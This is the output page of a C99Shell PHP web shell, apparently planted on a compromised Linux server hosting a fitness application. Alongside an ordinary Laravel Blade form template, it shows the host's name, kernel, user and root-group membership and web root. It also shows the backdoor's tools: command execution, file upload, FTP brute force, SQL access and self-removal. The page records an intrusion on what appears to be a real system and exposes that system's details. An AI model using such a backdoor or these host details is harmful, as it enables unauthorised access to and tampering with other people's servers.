!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/fitness.picotech.app/public_html/resources/views/admin/step/partial/   drwxr-xr-x
Free 22.5 GB of 117.98 GB (19.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     design_five.blade.php (3.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
    $details=$radio_details;
    $checkbox_detail=isset($details[0])?json_decode($details[0]->value):'';

@endphp


<div class="row">
    <div class="col-md-12 radio-section">
        <div class="card">
            <div class="card-header">
                <h5>Radio Section</h5>
            </div>
            <div class="card-body">
                <div class="row">
                    <div class="form-group col-md-6">
                        <label for="">{{trans('Title')}} <span class="text-danger">*</span></label>
                        <input type="text" value="{{isset($checkbox_detail->title)?$checkbox_detail->title:''}}" class="form-control"
                               name="radio_title[]"  placeholder="{{trans('Enter title')}}">
                    </div>

                    <div class="form-group col-md-6">
                        <label for="">{{trans('Value')}}</label>
                        <input type="text" class="form-control" value="{{isset($checkbox_detail->value)?$checkbox_detail->value:''}}"
                               name="radio_value[]"  placeholder="{{trans('Enter value')}}">
                    </div>

                    <div class="form-group col-md-12">
                        <label for="">{{trans('Description')}}</label>
                        <input type="text" class="form-control" value="{{isset($checkbox_detail->description)?$checkbox_detail->description:''}}"
                               name="radio_description[]"  placeholder="{{trans('Enter Description')}}">
                    </div>

                </div>

                <div class="form-group text-right justify-content-end">
                    <button class="btn btn-success btn-sm add_radio" type="button">
                        <i class="fa fa-plus"></i>
                    </button>
                </div>

            </div>
        </div>


        @if(isset($step) && $step->step_details)
            @php $step_counter=9999; $step_details=$step->step_details()->where('type', 'checkbox')->get(); @endphp
            @foreach ($radio_details as $key=>$detail)
                @if($key !='0')
                    @php $step_counter++; $values=$detail->value?json_decode($detail->value):''; @endphp
                    <div class="card mt-2" id="radio_append_{{$step_counter}}">
                        <div class="card-body">
                            <button class="btn-danger btn-sm float-right delete_radio_append" data-id="{{$step_counter}}" type="button"> <i class="fa fa-trash"></i> </button>

                            <div class="row">
                                <div class="form-group col-md-6">
                                    <label for="">{{trans('Title')}} <span class="text-danger">*</span></label>
                                    <input type="text" class="form-control" value="{{isset($values->title)?$values->title:''}}"
                                           name="radio_title[]">
                                </div>

                                <div class="form-group col-md-6">
                                    <label for="">{{trans('Value')}}</label>
                                    <input type="text" class="form-control" value="{{isset($values->value)?$values->value:''}}"
                                           name="radio_value[]">
                                </div>

                                <div class="form-group col-md-12">
                                    <label for="">{{trans('Value')}}</label>
                                    <input type="text" class="form-control" placeholder="{{trans('Enter Description')}}" value="{{isset($values->description)?$values->description:''}}"  name="radio_description[]">
                                </div>
                            </div>

                        </div>
                    </div>
                @endif
            @endforeach
        @endif
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0138 ]--